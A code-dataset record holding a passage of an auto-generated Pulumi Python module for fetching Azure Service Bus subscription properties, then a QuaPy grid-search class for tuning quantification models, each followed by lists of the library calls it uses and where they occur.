'dead_lettering_on_message_expiration' to be a bool") pulumi.set(__self__, "dead_lettering_on_message_expiration", dead_lettering_on_message_expiration) if default_message_time_to_live and not isinstance(default_message_time_to_live, str): raise TypeError("Expected argument 'default_message_time_to_live' to be a str") pulumi.set(__self__, "default_message_time_to_live", default_message_time_to_live) if duplicate_detection_history_time_window and not isinstance(duplicate_detection_history_time_window, str): raise TypeError("Expected argument 'duplicate_detection_history_time_window' to be a str") pulumi.set(__self__, "duplicate_detection_history_time_window", duplicate_detection_history_time_window) if enable_batched_operations and not isinstance(enable_batched_operations, bool): raise TypeError("Expected argument 'enable_batched_operations' to be a bool") pulumi.set(__self__, "enable_batched_operations", enable_batched_operations) if forward_dead_lettered_messages_to and not isinstance(forward_dead_lettered_messages_to, str): raise TypeError("Expected argument 'forward_dead_lettered_messages_to' to be a str") pulumi.set(__self__, "forward_dead_lettered_messages_to", forward_dead_lettered_messages_to) if forward_to and not isinstance(forward_to, str): raise TypeError("Expected argument 'forward_to' to be a str") pulumi.set(__self__, "forward_to", forward_to) if id and not isinstance(id, str): raise TypeError("Expected argument 'id' to be a str") pulumi.set(__self__, "id", id) if is_client_affine and not isinstance(is_client_affine, bool): raise TypeError("Expected argument 'is_client_affine' to be a bool") pulumi.set(__self__, "is_client_affine", is_client_affine) if lock_duration and not isinstance(lock_duration, str): raise TypeError("Expected argument 'lock_duration' to be a str") pulumi.set(__self__, "lock_duration", lock_duration) if max_delivery_count and not isinstance(max_delivery_count, int): raise TypeError("Expected argument 'max_delivery_count' to be a int") pulumi.set(__self__, "max_delivery_count", max_delivery_count) if message_count and not isinstance(message_count, float): raise TypeError("Expected argument 'message_count' to be a float") pulumi.set(__self__, "message_count", message_count) if name and not isinstance(name, str): raise TypeError("Expected argument 'name' to be a str") pulumi.set(__self__, "name", name) if requires_session and not isinstance(requires_session, bool): raise TypeError("Expected argument 'requires_session' to be a bool") pulumi.set(__self__, "requires_session", requires_session) if status and not isinstance(status, str): raise TypeError("Expected argument 'status' to be a str") pulumi.set(__self__, "status", status) if system_data and not isinstance(system_data, dict): raise TypeError("Expected argument 'system_data' to be a dict") pulumi.set(__self__, "system_data", system_data) if type and not isinstance(type, str): raise TypeError("Expected argument 'type' to be a str") pulumi.set(__self__, "type", type) if updated_at and not isinstance(updated_at, str): raise TypeError("Expected argument 'updated_at' to be a str") pulumi.set(__self__, "updated_at", updated_at) @property @pulumi.getter(name="accessedAt") def accessed_at(self) -> str: """ Last time there was a receive request to this subscription. """ return pulumi.get(self, "accessed_at") @property @pulumi.getter(name="autoDeleteOnIdle") def auto_delete_on_idle(self) -> Optional[str]: """ ISO 8061 timeSpan idle interval after which the topic is automatically deleted. The minimum duration is 5 minutes. """ return pulumi.get(self, "auto_delete_on_idle") @property @pulumi.getter(name="clientAffineProperties") def client_affine_properties(self) -> Optional['outputs.SBClientAffinePropertiesResponse']: """ Properties specific to client affine subscriptions. """ return pulumi.get(self, "client_affine_properties") @property @pulumi.getter(name="countDetails") def count_details(self) -> 'outputs.MessageCountDetailsResponse': """ Message count details """ return pulumi.get(self, "count_details") @property @pulumi.getter(name="createdAt") def created_at(self) -> str: """ Exact time the message was created. """ return pulumi.get(self, "created_at") @property @pulumi.getter(name="deadLetteringOnFilterEvaluationExceptions") def dead_lettering_on_filter_evaluation_exceptions(self) -> Optional[bool]: """ Value that indicates whether a subscription has dead letter support on filter evaluation exceptions. """ return pulumi.get(self, "dead_lettering_on_filter_evaluation_exceptions") @property @pulumi.getter(name="deadLetteringOnMessageExpiration") def dead_lettering_on_message_expiration(self) -> Optional[bool]: """ Value that indicates whether a subscription has dead letter support when a message expires. """ return pulumi.get(self, "dead_lettering_on_message_expiration") @property @pulumi.getter(name="defaultMessageTimeToLive") def default_message_time_to_live(self) -> Optional[str]: """ ISO 8061 Default message timespan to live value. This is the duration after which the message expires, starting from when the message is sent to Service Bus. This is the default value used when TimeToLive is not set on a message itself. """ return pulumi.get(self, "default_message_time_to_live") @property @pulumi.getter(name="duplicateDetectionHistoryTimeWindow") def duplicate_detection_history_time_window(self) -> Optional[str]: """ ISO 8601 timeSpan structure that defines the duration of the duplicate detection history. The default value is 10 minutes. """ return pulumi.get(self, "duplicate_detection_history_time_window") @property @pulumi.getter(name="enableBatchedOperations") def enable_batched_operations(self) -> Optional[bool]: """ Value that indicates whether server-side batched operations are enabled. """ return pulumi.get(self, "enable_batched_operations") @property @pulumi.getter(name="forwardDeadLetteredMessagesTo") def forward_dead_lettered_messages_to(self) -> Optional[str]: """ Queue/Topic name to forward the Dead Letter message """ return pulumi.get(self, "forward_dead_lettered_messages_to") @property @pulumi.getter(name="forwardTo") def forward_to(self) -> Optional[str]: """ Queue/Topic name to forward the messages """ return pulumi.get(self, "forward_to") @property @pulumi.getter def id(self) -> str: """ Resource Id """ return pulumi.get(self, "id") @property @pulumi.getter(name="isClientAffine") def is_client_affine(self) -> Optional[bool]: """ Value that indicates whether the subscription has an affinity to the client id. """ return pulumi.get(self, "is_client_affine") @property @pulumi.getter(name="lockDuration") def lock_duration(self) -> Optional[str]: """ ISO 8061 lock duration timespan for the subscription. The default value is 1 minute. """ return pulumi.get(self, "lock_duration") @property @pulumi.getter(name="maxDeliveryCount") def max_delivery_count(self) -> Optional[int]: """ Number of maximum deliveries. """ return pulumi.get(self, "max_delivery_count") @property @pulumi.getter(name="messageCount") def message_count(self) -> float: """ Number of messages. """ return pulumi.get(self, "message_count") @property @pulumi.getter def name(self) -> str: """ Resource name """ return pulumi.get(self, "name") @property @pulumi.getter(name="requiresSession") def requires_session(self) -> Optional[bool]: """ Value indicating if a subscription supports the concept of sessions. """ return pulumi.get(self, "requires_session") @property @pulumi.getter def status(self) -> Optional[str]: """ Enumerates the possible values for the status of a messaging entity. """ return pulumi.get(self, "status") @property @pulumi.getter(name="systemData") def system_data(self) -> 'outputs.SystemDataResponse': """ The system meta data relating to this resource. """ return pulumi.get(self, "system_data") @property @pulumi.getter def type(self) -> str: """ Resource type """ return pulumi.get(self, "type") @property @pulumi.getter(name="updatedAt") def updated_at(self) -> str: """ The exact time the message was updated. """ return pulumi.get(self, "updated_at") class AwaitableGetSubscriptionResult(GetSubscriptionResult): # pylint: disable=using-constant-test def __await__(self): if False: yield self return GetSubscriptionResult( accessed_at=self.accessed_at, auto_delete_on_idle=self.auto_delete_on_idle, client_affine_properties=self.client_affine_properties, count_details=self.count_details, created_at=self.created_at, dead_lettering_on_filter_evaluation_exceptions=self.dead_lettering_on_filter_evaluation_exceptions, dead_lettering_on_message_expiration=self.dead_lettering_on_message_expiration, default_message_time_to_live=self.default_message_time_to_live, duplicate_detection_history_time_window=self.duplicate_detection_history_time_window, enable_batched_operations=self.enable_batched_operations, forward_dead_lettered_messages_to=self.forward_dead_lettered_messages_to, forward_to=self.forward_to, id=self.id, is_client_affine=self.is_client_affine, lock_duration=self.lock_duration, max_delivery_count=self.max_delivery_count, message_count=self.message_count, name=self.name, requires_session=self.requires_session, status=self.status, system_data=self.system_data, type=self.type, updated_at=self.updated_at) def get_subscription(namespace_name: Optional[str] = None, resource_group_name: Optional[str] = None, subscription_name: Optional[str] = None, topic_name: Optional[str] = None, opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSubscriptionResult: """ Description of subscription resource. :param str namespace_name: The namespace name :param str resource_group_name: Name of the Resource group within the Azure subscription. :param str subscription_name: The subscription name. :param str topic_name: The topic name. """ __args__ = dict() __args__['namespaceName'] = namespace_name __args__['resourceGroupName'] = resource_group_name __args__['subscriptionName'] = subscription_name __args__['topicName'] = topic_name if opts is None: opts = pulumi.InvokeOptions() if opts.version is None: opts.version = _utilities.get_version() __ret__ = pulumi.runtime.invoke('azure-native:servicebus/v20210601preview:getSubscription', __args__, opts=opts, typ=GetSubscriptionResult).value return AwaitableGetSubscriptionResult( accessed_at=__ret__.accessed_at, auto_delete_on_idle=__ret__.auto_delete_on_idle, client_affine_properties=__ret__.client_affine_properties, count_details=__ret__.count_details, created_at=__ret__.created_at, dead_lettering_on_filter_evaluation_exceptions=__ret__.dead_lettering_on_filter_evaluation_exceptions, dead_lettering_on_message_expiration=__ret__.dead_lettering_on_message_expiration, default_message_time_to_live=__ret__.default_message_time_to_live, duplicate_detection_history_time_window=__ret__.duplicate_detection_history_time_window, enable_batched_operations=__ret__.enable_batched_operations, forward_dead_lettered_messages_to=__ret__.forward_dead_lettered_messages_to, forward_to=__ret__.forward_to, id=__ret__.id, is_client_affine=__ret__.is_client_affine, lock_duration=__ret__.lock_duration, max_delivery_count=__ret__.max_delivery_count, message_count=__ret__.message_count, name=__ret__.name, requires_session=__ret__.requires_session, status=__ret__.status, system_data=__ret__.system_data, type=__ret__.type, updated_at=__ret__.updated_at)
[ "pulumi.get", "pulumi.getter", "pulumi.set", "pulumi.InvokeOptions", "pulumi.runtime.invoke" ]
[((6398, 6430), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""accessedAt"""'}), "(name='accessedAt')\n", (6411, 6430), False, 'import pulumi\n'), ((6624, 6662), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""autoDeleteOnIdle"""'}), "(name='autoDeleteOnIdle')\n", (6637, 6662), False, 'import pulumi\n'), ((6937, 6981), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""clientAffineProperties"""'}), "(name='clientAffineProperties')\n", (6950, 6981), False, 'import pulumi\n'), ((7242, 7276), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""countDetails"""'}), "(name='countDetails')\n", (7255, 7276), False, 'import pulumi\n'), ((7470, 7501), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""createdAt"""'}), "(name='createdAt')\n", (7483, 7501), False, 'import pulumi\n'), ((7669, 7732), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""deadLetteringOnFilterEvaluationExceptions"""'}), "(name='deadLetteringOnFilterEvaluationExceptions')\n", (7682, 7732), False, 'import pulumi\n'), ((8048, 8102), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""deadLetteringOnMessageExpiration"""'}), "(name='deadLetteringOnMessageExpiration')\n", (8061, 8102), False, 'import pulumi\n'), ((8389, 8435), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""defaultMessageTimeToLive"""'}), "(name='defaultMessageTimeToLive')\n", (8402, 8435), False, 'import pulumi\n'), ((8850, 8907), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""duplicateDetectionHistoryTimeWindow"""'}), "(name='duplicateDetectionHistoryTimeWindow')\n", (8863, 8907), False, 'import pulumi\n'), ((9230, 9275), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""enableBatchedOperations"""'}), "(name='enableBatchedOperations')\n", (9243, 9275), False, 'import pulumi\n'), ((9521, 9572), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""forwardDeadLetteredMessagesTo"""'}), "(name='forwardDeadLetteredMessagesTo')\n", (9534, 9572), False, 'import pulumi\n'), ((9812, 9843), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""forwardTo"""'}), "(name='forwardTo')\n", (9825, 9843), False, 'import pulumi\n'), ((10167, 10203), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""isClientAffine"""'}), "(name='isClientAffine')\n", (10180, 10203), False, 'import pulumi\n'), ((10438, 10472), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""lockDuration"""'}), "(name='lockDuration')\n", (10451, 10472), False, 'import pulumi\n'), ((10705, 10743), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""maxDeliveryCount"""'}), "(name='maxDeliveryCount')\n", (10718, 10743), False, 'import pulumi\n'), ((10931, 10965), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""messageCount"""'}), "(name='messageCount')\n", (10944, 10965), False, 'import pulumi\n'), ((11272, 11309), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""requiresSession"""'}), "(name='requiresSession')\n", (11285, 11309), False, 'import pulumi\n'), ((11749, 11781), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""systemData"""'}), "(name='systemData')\n", (11762, 11781), False, 'import pulumi\n'), ((12135, 12166), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""updatedAt"""'}), "(name='updatedAt')\n", (12148, 12166), False, 'import pulumi\n'), ((1293, 1341), 'pulumi.set', 'pulumi.set', (['__self__', '"""accessed_at"""', 'accessed_at'], {}), "(__self__, 'accessed_at', accessed_at)\n", (1303, 1341), False, 'import pulumi\n'), ((1510, 1574), 'pulumi.set', 'pulumi.set', (['__self__', '"""auto_delete_on_idle"""', 'auto_delete_on_idle'], {}), "(__self__, 'auto_delete_on_idle', auto_delete_on_idle)\n", (1520, 1574), False, 'import pulumi\n'), ((1760, 1834), 'pulumi.set', 'pulumi.set', (['__self__', '"""client_affine_properties"""', 'client_affine_properties'], {}), "(__self__, 'client_affine_properties', client_affine_properties)\n", (1770, 1834), False, 'import pulumi\n'), ((1987, 2039), 'pulumi.set', 'pulumi.set', (['__self__', '"""count_details"""', 'count_details'], {}), "(__self__, 'count_details', count_details)\n", (1997, 2039), False, 'import pulumi\n'), ((2181, 2227), 'pulumi.set', 'pulumi.set', (['__self__', '"""created_at"""', 'created_at'], {}), "(__self__, 'created_at', created_at)\n", (2191, 2227), False, 'import pulumi\n'), ((2479, 2601), 'pulumi.set', 'pulumi.set', (['__self__', '"""dead_lettering_on_filter_evaluation_exceptions"""', 'dead_lettering_on_filter_evaluation_exceptions'], {}), "(__self__, 'dead_lettering_on_filter_evaluation_exceptions',\n dead_lettering_on_filter_evaluation_exceptions)\n", (2489, 2601), False, 'import pulumi\n'), ((2819, 2921), 'pulumi.set', 'pulumi.set', (['__self__', '"""dead_lettering_on_message_expiration"""', 'dead_lettering_on_message_expiration'], {}), "(__self__, 'dead_lettering_on_message_expiration',\n dead_lettering_on_message_expiration)\n", (2829, 2921), False, 'import pulumi\n'), ((3113, 3199), 'pulumi.set', 'pulumi.set', (['__self__', '"""default_message_time_to_live"""', 'default_message_time_to_live'], {}), "(__self__, 'default_message_time_to_live',\n default_message_time_to_live)\n", (3123, 3199), False, 'import pulumi\n'), ((3424, 3532), 'pulumi.set', 'pulumi.set', (['__self__', '"""duplicate_detection_history_time_window"""', 'duplicate_detection_history_time_window'], {}), "(__self__, 'duplicate_detection_history_time_window',\n duplicate_detection_history_time_window)\n", (3434, 3532), False, 'import pulumi\n'), ((3717, 3793), 'pulumi.set', 'pulumi.set', (['__self__', '"""enable_batched_operations"""', 'enable_batched_operations'], {}), "(__self__, 'enable_batched_operations', enable_batched_operations)\n", (3727, 3793), False, 'import pulumi\n'), ((4004, 4100), 'pulumi.set', 'pulumi.set', (['__self__', '"""forward_dead_lettered_messages_to"""', 'forward_dead_lettered_messages_to'], {}), "(__self__, 'forward_dead_lettered_messages_to',\n forward_dead_lettered_messages_to)\n", (4014, 4100), False, 'import pulumi\n'), ((4238, 4284), 'pulumi.set', 'pulumi.set', (['__self__', '"""forward_to"""', 'forward_to'], {}), "(__self__, 'forward_to', forward_to)\n", (4248, 4284), False, 'import pulumi\n'), ((4402, 4432), 'pulumi.set', 'pulumi.set', (['__self__', '"""id"""', 'id'], {}), "(__self__, 'id', id)\n", (4412, 4432), False, 'import pulumi\n'), ((4594, 4652), 'pulumi.set', 'pulumi.set', (['__self__', '"""is_client_affine"""', 'is_client_affine'], {}), "(__self__, 'is_client_affine', is_client_affine)\n", (4604, 4652), False, 'import pulumi\n'), ((4803, 4855), 'pulumi.set', 'pulumi.set', (['__self__', '"""lock_duration"""', 'lock_duration'], {}), "(__self__, 'lock_duration', lock_duration)\n", (4813, 4855), False, 'import pulumi\n'), ((5021, 5083), 'pulumi.set', 'pulumi.set', (['__self__', '"""max_delivery_count"""', 'max_delivery_count'], {}), "(__self__, 'max_delivery_count', max_delivery_count)\n", (5031, 5083), False, 'import pulumi\n'), ((5238, 5290), 'pulumi.set', 'pulumi.set', (['__self__', '"""message_count"""', 'message_count'], {}), "(__self__, 'message_count', message_count)\n", (5248, 5290), False, 'import pulumi\n'), ((5414, 5448), 'pulumi.set', 'pulumi.set', (['__self__', '"""name"""', 'name'], {}), "(__self__, 'name', name)\n", (5424, 5448), False, 'import pulumi\n'), ((5610, 5668), 'pulumi.set', 'pulumi.set', (['__self__', '"""requires_session"""', 'requires_session'], {}), "(__self__, 'requires_session', requires_session)\n", (5620, 5668), False, 'import pulumi\n'), ((5798, 5836), 'pulumi.set', 'pulumi.set', (['__self__', '"""status"""', 'status'], {}), "(__self__, 'status', status)\n", (5808, 5836), False, 'import pulumi\n'), ((5983, 6031), 'pulumi.set', 'pulumi.set', (['__self__', '"""system_data"""', 'system_data'], {}), "(__self__, 'system_data', system_data)\n", (5993, 6031), False, 'import pulumi\n'), ((6155, 6189), 'pulumi.set', 'pulumi.set', (['__self__', '"""type"""', 'type'], {}), "(__self__, 'type', type)\n", (6165, 6189), False, 'import pulumi\n'), ((6331, 6377), 'pulumi.set', 'pulumi.set', (['__self__', '"""updated_at"""', 'updated_at'], {}), "(__self__, 'updated_at', updated_at)\n", (6341, 6377), False, 'import pulumi\n'), ((6572, 6603), 'pulumi.get', 'pulumi.get', (['self', '"""accessed_at"""'], {}), "(self, 'accessed_at')\n", (6582, 6603), False, 'import pulumi\n'), ((6877, 6916), 'pulumi.get', 'pulumi.get', (['self', '"""auto_delete_on_idle"""'], {}), "(self, 'auto_delete_on_idle')\n", (6887, 6916), False, 'import pulumi\n'), ((7177, 7221), 'pulumi.get', 'pulumi.get', (['self', '"""client_affine_properties"""'], {}), "(self, 'client_affine_properties')\n", (7187, 7221), False, 'import pulumi\n'), ((7416, 7449), 'pulumi.get', 'pulumi.get', (['self', '"""count_details"""'], {}), "(self, 'count_details')\n", (7426, 7449), False, 'import pulumi\n'), ((7618, 7648), 'pulumi.get', 'pulumi.get', (['self', '"""created_at"""'], {}), "(self, 'created_at')\n", (7628, 7648), False, 'import pulumi\n'), ((7961, 8027), 'pulumi.get', 'pulumi.get', (['self', '"""dead_lettering_on_filter_evaluation_exceptions"""'], {}), "(self, 'dead_lettering_on_filter_evaluation_exceptions')\n", (7971, 8027), False, 'import pulumi\n'), ((8312, 8368), 'pulumi.get', 'pulumi.get', (['self', '"""dead_lettering_on_message_expiration"""'], {}), "(self, 'dead_lettering_on_message_expiration')\n", (8322, 8368), False, 'import pulumi\n'), ((8781, 8829), 'pulumi.get', 'pulumi.get', (['self', '"""default_message_time_to_live"""'], {}), "(self, 'default_message_time_to_live')\n", (8791, 8829), False, 'import pulumi\n'), ((9150, 9209), 'pulumi.get', 'pulumi.get', (['self', '"""duplicate_detection_history_time_window"""'], {}), "(self, 'duplicate_detection_history_time_window')\n", (9160, 9209), False, 'import pulumi\n'), ((9455, 9500), 'pulumi.get', 'pulumi.get', (['self', '"""enable_batched_operations"""'], {}), "(self, 'enable_batched_operations')\n", (9465, 9500), False, 'import pulumi\n'), ((9738, 9791), 'pulumi.get', 'pulumi.get', (['self', '"""forward_dead_lettered_messages_to"""'], {}), "(self, 'forward_dead_lettered_messages_to')\n", (9748, 9791), False, 'import pulumi\n'), ((9975, 10005), 'pulumi.get', 'pulumi.get', (['self', '"""forward_to"""'], {}), "(self, 'forward_to')\n", (9985, 10005), False, 'import pulumi\n'), ((10124, 10146), 'pulumi.get', 'pulumi.get', (['self', '"""id"""'], {}), "(self, 'id')\n", (10134, 10146), False, 'import pulumi\n'), ((10381, 10417), 'pulumi.get', 'pulumi.get', (['self', '"""is_client_affine"""'], {}), "(self, 'is_client_affine')\n", (10391, 10417), False, 'import pulumi\n'), ((10651, 10684), 'pulumi.get', 'pulumi.get', (['self', '"""lock_duration"""'], {}), "(self, 'lock_duration')\n", (10661, 10684), False, 'import pulumi\n'), ((10872, 10910), 'pulumi.get', 'pulumi.get', (['self', '"""max_delivery_count"""'], {}), "(self, 'max_delivery_count')\n", (10882, 10910), False, 'import pulumi\n'), ((11071, 11104), 'pulumi.get', 'pulumi.get', (['self', '"""message_count"""'], {}), "(self, 'message_count')\n", (11081, 11104), False, 'import pulumi\n'), ((11227, 11251), 'pulumi.get', 'pulumi.get', (['self', '"""name"""'], {}), "(self, 'name')\n", (11237, 11251), False, 'import pulumi\n'), ((11476, 11512), 'pulumi.get', 'pulumi.get', (['self', '"""requires_session"""'], {}), "(self, 'requires_session')\n", (11486, 11512), False, 'import pulumi\n'), ((11702, 11728), 'pulumi.get', 'pulumi.get', (['self', '"""status"""'], {}), "(self, 'status')\n", (11712, 11728), False, 'import pulumi\n'), ((11936, 11967), 'pulumi.get', 'pulumi.get', (['self', '"""system_data"""'], {}), "(self, 'system_data')\n", (11946, 11967), False, 'import pulumi\n'), ((12090, 12114), 'pulumi.get', 'pulumi.get', (['self', '"""type"""'], {}), "(self, 'type')\n", (12100, 12114), False, 'import pulumi\n'), ((12287, 12317), 'pulumi.get', 'pulumi.get', (['self', '"""updated_at"""'], {}), "(self, 'updated_at')\n", (12297, 12317), False, 'import pulumi\n'), ((14701, 14723), 'pulumi.InvokeOptions', 'pulumi.InvokeOptions', ([], {}), '()\n', (14721, 14723), False, 'import pulumi\n'), ((14815, 14953), 'pulumi.runtime.invoke', 'pulumi.runtime.invoke', (['"""azure-native:servicebus/v20210601preview:getSubscription"""', '__args__'], {'opts': 'opts', 'typ': 'GetSubscriptionResult'}), "(\n 'azure-native:servicebus/v20210601preview:getSubscription', __args__,\n opts=opts, typ=GetSubscriptionResult)\n", (14836, 14953), False, 'import pulumi\n')]
import itertools import signal from copy import deepcopy from typing import Union, Callable import numpy as np import quapy as qp from quapy.data.base import LabelledCollection from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction from quapy.method.aggregative import BaseQuantifier import inspect from util import _check_sample_size class GridSearchQ(BaseQuantifier): """Grid Search optimization targeting a quantification-oriented metric. Optimizes the hyperparameters of a quantification method, based on an evaluation method and on an evaluation protocol for quantification. :param model: the quantifier to optimize :type model: BaseQuantifier :param param_grid: a dictionary with keys the parameter names and values the list of values to explore :param sample_size: the size of the samples to extract from the validation set (ignored if protocl='gen') :param protocol: either 'app' for the artificial prevalence protocol, 'npp' for the natural prevalence protocol, or 'gen' for using a custom sampling generator function :param n_prevpoints: if specified, indicates the number of equally distant points to extract from the interval [0,1] in order to define the prevalences of the samples; e.g., if n_prevpoints=5, then the prevalences for each class will be explored in [0.00, 0.25, 0.50, 0.75, 1.00]. If not specified, then eval_budget is requested. Ignored if protocol!='app'. :param n_repetitions: the number of repetitions for each combination of prevalences. This parameter is ignored for the protocol='app' if eval_budget is set and is lower than the number of combinations that would be generated using the value assigned to n_prevpoints (for the current number of classes and n_repetitions). Ignored for protocol='npp' and protocol='gen' (use eval_budget for setting a maximum number of samples in those cases). :param eval_budget: if specified, sets a ceil on the number of evaluations to perform for each hyper-parameter combination. For example, if protocol='app', there are 3 classes, n_repetitions=1 and eval_budget=20, then n_prevpoints will be set to 5, since this will generate 15 different prevalences, i.e., [0, 0, 1], [0, 0.25, 0.75], [0, 0.5, 0.5] ... [1, 0, 0], and since setting it to 6 would generate more than 20. When protocol='gen', indicates the maximum number of samples to generate, but less samples will be generated if the generator yields less samples. :param error: an error function (callable) or a string indicating the name of an error function (valid ones are those in qp.error.QUANTIFICATION_ERROR :param refit: whether or not to refit the model on the whole labelled collection (training+validation) with the best chosen hyperparameter combination. Ignored if protocol='gen' :param val_split: either a LabelledCollection on which to test the performance of the different settings, or a float in [0,1] indicating the proportion of labelled data to extract from the training set, or a callable returning a generator function each time it is invoked (only for protocol='gen'). :param n_jobs: number of parallel jobs :param random_seed: set the seed of the random generator to replicate experiments. Ignored if protocol='gen'. :param timeout: establishes a timer (in seconds) for each of the hyperparameters configurations being tested. Whenever a run takes longer than this timer, that configuration will be ignored. If all configurations end up being ignored, a TimeoutError exception is raised. If -1 (default) then no time bound is set. :param verbose: set to True to get information through the stdout """ def __init__(self, model: BaseQuantifier, param_grid: dict, sample_size: Union[int, None] = None, protocol='app', n_prevpoints: int = None, n_repetitions: int = 1, eval_budget: int = None, error: Union[Callable, str] = qp.error.mae, refit=True, val_split=0.4, n_jobs=1, random_seed=42, timeout=-1, verbose=False): self.model = model self.param_grid = param_grid self.sample_size = sample_size self.protocol = protocol.lower() self.n_prevpoints = n_prevpoints self.n_repetitions = n_repetitions self.eval_budget = eval_budget self.refit = refit self.val_split = val_split self.n_jobs = n_jobs self.random_seed = random_seed self.timeout = timeout self.verbose = verbose self.__check_error(error) assert self.protocol in {'app', 'npp', 'gen'}, \ 'unknown protocol: valid ones are "app" or "npp" for the "artificial" or the "natural" prevalence ' \ 'protocols. Use protocol="gen" when passing a generator function thorough val_split that yields a ' \ 'sample (instances) and their prevalence (ndarray) at each iteration.' assert self.eval_budget is None or isinstance(self.eval_budget, int) if self.protocol in ['npp', 'gen']: if self.protocol=='npp' and (self.eval_budget is None or self.eval_budget <= 0): raise ValueError(f'when protocol="npp" the parameter eval_budget should be ' f'indicated (and should be >0).') if self.n_repetitions != 1: print('[warning] n_repetitions has been set and will be ignored for the selected protocol') def _sout(self, msg): if self.verbose: print(f'[{self.__class__.__name__}]: {msg}') def __check_training_validation(self, training, validation): if isinstance(validation, LabelledCollection): return training, validation elif isinstance(validation, float): assert 0. < validation < 1., 'validation proportion should be in (0,1)' training, validation = training.split_stratified(train_prop=1 - validation, random_state=self.random_seed) return training, validation elif self.protocol=='gen' and inspect.isgenerator(validation()): return training, validation else: raise ValueError(f'"validation" must either be a LabelledCollection or a float in (0,1) indicating the' f'proportion of training documents to extract (type found: {type(validation)}). ' f'Optionally, "validation" can be a callable function returning a generator that yields ' f'the sample instances along with their true prevalence at each iteration by ' f'setting protocol="gen".') def __check_error(self, error): if error in qp.error.QUANTIFICATION_ERROR: self.error = error elif isinstance(error, str): self.error = qp.error.from_name(error) elif hasattr(error, '__call__'): self.error = error else: raise ValueError(f'unexpected error type; must either be a callable function or a str representing\n' f'the name of an error function in {qp.error.QUANTIFICATION_ERROR_NAMES}') def __generate_predictions(self, model, val_split): commons = { 'n_repetitions': self.n_repetitions, 'n_jobs': self.n_jobs, 'random_seed': self.random_seed, 'verbose': False } if self.protocol == 'app': return artificial_prevalence_prediction( model, val_split, self.sample_size, n_prevpoints=self.n_prevpoints, eval_budget=self.eval_budget, **commons ) elif self.protocol == 'npp': return natural_prevalence_prediction( model, val_split, self.sample_size, **commons) elif self.protocol == 'gen': return gen_prevalence_prediction(model, gen_fn=val_split, eval_budget=self.eval_budget) else: raise ValueError('unknown protocol') def fit(self, training: LabelledCollection, val_split: Union[LabelledCollection, float, Callable] = None): """ Learning routine. Fits methods with all combinations of hyperparameters and selects the one minimizing the error metric. :param training: the training set on which to optimize the hyperparameters :param val_split: either a LabelledCollection on which to test the performance of the different settings, or a float in [0,1] indicating the proportion of labelled data to extract from the training set :return: self """ if val_split is None: val_split = self.val_split training, val_split = self.__check_training_validation(training, val_split) if self.protocol != 'gen': self.sample_size = _check_sample_size(self.sample_size) params_keys = list(self.param_grid.keys()) params_values = list(self.param_grid.values()) model = self.model if self.timeout > 0: def handler(signum, frame): self._sout('timeout reached') raise TimeoutError() signal.signal(signal.SIGALRM, handler) self.param_scores_ = {} self.best_score_ = None some_timeouts = False for values in itertools.product(*params_values): params = dict({k: values[i] for i, k in enumerate(params_keys)}) if self.timeout > 0: signal.alarm(self.timeout) try: # overrides default parameters with the parameters being explored at this iteration model.set_params(**params) model.fit(training) true_prevalences, estim_prevalences = self.__generate_predictions(model, val_split) score = self.error(true_prevalences, estim_prevalences) self._sout(f'checking hyperparams={params} got {self.error.__name__} score {score:.5f}') if self.best_score_ is None or score < self.best_score_: self.best_score_ = score self.best_params_ = params self.best_model_ = deepcopy(model) self.param_scores_[str(params)] = score if self.timeout > 0: signal.alarm(0) except TimeoutError: print(f'timeout reached for config {params}') some_timeouts = True if self.best_score_ is None and some_timeouts: raise TimeoutError('all jobs took more than the timeout time to end') self._sout(f'optimization finished: best params {self.best_params_} (score={self.best_score_:.5f})') if self.refit: self._sout(f'refitting on the whole development set') self.best_model_.fit(training + val_split) return self def quantify(self, instances): """Estimate class prevalence values using the best model found after calling the :meth:`fit` method. :param instances: sample contanining the instances :return: a ndarray of shape `(n_classes)` with class prevalence estimates as according to the best model found by the model selection process. """ assert hasattr(self, 'best_model_'), 'quantify called before fit' return self.best_model().quantify(instances) @property def classes_(self): """ Classes on which the quantifier has been trained on. :return: a ndarray of shape `(n_classes)` with the class identifiers """ return self.best_model().classes_ def set_params(self, **parameters): """Sets the hyper-parameters to explore. :param parameters: a dictionary with keys the parameter names and values the list of values to explore """ self.param_grid = parameters def get_params(self, deep=True): """Returns the dictionary of hyper-parameters to explore (`param_grid`) :param deep: Unused :return: the dictionary `param_grid` """ return self.param_grid def best_model(self): """ Returns the best model found after calling the :meth:`fit` method, i.e., the one trained on the combination of hyper-parameters that minimized the error function. :return: a trained quantifier """ if hasattr(self, 'best_model_'): return self.best_model_ raise ValueError('best_model called before fit')
[ "quapy.evaluation.natural_prevalence_prediction", "signal.signal", "util._check_sample_size", "itertools.product", "quapy.error.from_name", "quapy.evaluation.artificial_prevalence_prediction", "quapy.evaluation.gen_prevalence_prediction", "signal.alarm", "copy.deepcopy" ]
